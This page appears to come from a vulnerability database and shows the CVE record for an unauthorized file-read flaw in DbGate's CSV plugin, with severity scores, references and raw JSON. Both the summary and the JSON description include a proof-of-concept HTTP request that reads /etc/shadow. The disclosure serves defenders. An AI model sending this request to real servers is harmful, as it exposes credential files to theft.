CVE-2025-50185 (GCVE-0-2025-50185)
Vulnerability from cvelistv5
Published
2025-07-26 03:34
Modified
2025-07-28 18:55
Severity ?
7.0 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P
CWE
  • CWE-29 - Path Traversal: '..filename'
Summary
DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue. ``` POST /runners/load-reader HTTP/1.1 Host: <REPLACE ME> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: <REPLACE ME> Content-Type: application/json Authorization: Bearer <REPLACE ME> Content-Length: 127 Origin: http://192.168.124.119:3000 Connection: keep-alive Cookie: <REPLACE ME> Priority: u=0 Cache-Control: max-age=0 {"functionName":"reader@dbgate-plugin-csv","props":{"fileName":"/etc\/shadow","limitRows":100}} ``` The request payload: ![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a) Lines of the file being returned: ![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)
References
Impacted products
Vendor Product Version
dbgate dbgate Version: <= 6.6.0
 Create a notification for this product.
Show details on NVD website

To clipboard 

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-50185",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-07-28T15:27:58.994623Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-07-28T18:55:40.184Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "dbgate",
          "vendor": "dbgate",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 6.6.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.\n\n\n\n\n\n\n```\nPOST /runners/load-reader HTTP/1.1\nHost: \u003cREPLACE ME\u003e\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: \u003cREPLACE ME\u003e\nContent-Type: application/json\nAuthorization: Bearer \u003cREPLACE ME\u003e\nContent-Length: 127\nOrigin: http://192.168.124.119:3000\nConnection: keep-alive\nCookie: \u003cREPLACE ME\u003e\nPriority: u=0\nCache-Control: max-age=0\n\n{\"functionName\":\"reader@dbgate-plugin-csv\",\"props\":{\"fileName\":\"/etc\\/shadow\",\"limitRows\":100}}\n\n```\n\n\n\nThe request payload:\n![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a)\n\n\nLines of the file being returned:\n![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)"
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-29",
              "description": "CWE-29: Path Traversal: \u0027..filename\u0027",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-26T03:34:43.481Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9"
        },
        {
          "name": "https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102"
        }
      ],
      "source": {
        "advisory": "GHSA-7x75-fmx7-q6h9",
        "discovery": "UNKNOWN"
      },
      "title": "DbGate allows Unauthorized File Access via CSV Plugin"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-50185",
    "datePublished": "2025-07-26T03:34:43.481Z",
    "dateReserved": "2025-06-13T19:17:51.726Z",
    "dateUpdated": "2025-07-28T18:55:40.184Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-50185\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-07-28T15:27:58.994623Z\"}}}], \"references\": [{\"url\": \"https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-07-28T15:28:00.673Z\"}}], \"cna\": {\"title\": \"DbGate allows Unauthorized File Access via CSV Plugin\", \"source\": {\"advisory\": \"GHSA-7x75-fmx7-q6h9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"dbgate\", \"product\": \"dbgate\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 6.6.0\"}]}], \"references\": [{\"url\": \"https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9\", \"name\": \"https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102\", \"name\": \"https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"DbGate is cross-platform database manager. In versions 6.6.0 and below, DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system, regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result, even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.\\n\\n\\n\\n\\n\\n\\n```\\nPOST /runners/load-reader HTTP/1.1\\nHost: \u003cREPLACE ME\u003e\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0\\nAccept: */*\\nAccept-Language: en-US,en;q=0.5\\nAccept-Encoding: gzip, deflate, br\\nReferer: \u003cREPLACE ME\u003e\\nContent-Type: application/json\\nAuthorization: Bearer \u003cREPLACE ME\u003e\\nContent-Length: 127\\nOrigin: http://192.168.124.119:3000\\nConnection: keep-alive\\nCookie: \u003cREPLACE ME\u003e\\nPriority: u=0\\nCache-Control: max-age=0\\n\\n{\\\"functionName\\\":\\\"reader@dbgate-plugin-csv\\\",\\\"props\\\":{\\\"fileName\\\":\\\"/etc\\\\/shadow\\\",\\\"limitRows\\\":100}}\\n\\n```\\n\\n\\n\\nThe request payload:\\n![Screenshot From 2025-05-31 22-54-49](https://github.com/user-attachments/assets/28943ad7-14f8-432a-9836-cec5c3593c0a)\\n\\n\\nLines of the file being returned:\\n![Screenshot From 2025-05-31 22-55-23](https://github.com/user-attachments/assets/4fae4652-097d-4d39-9f7a-6ce39346ed1d)\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-29\", \"description\": \"CWE-29: Path Traversal: \u0027..filename\u0027\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-07-26T03:34:43.481Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-50185\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-07-28T18:55:40.184Z\", \"dateReserved\": \"2025-06-13T19:17:51.726Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-07-26T03:34:43.481Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.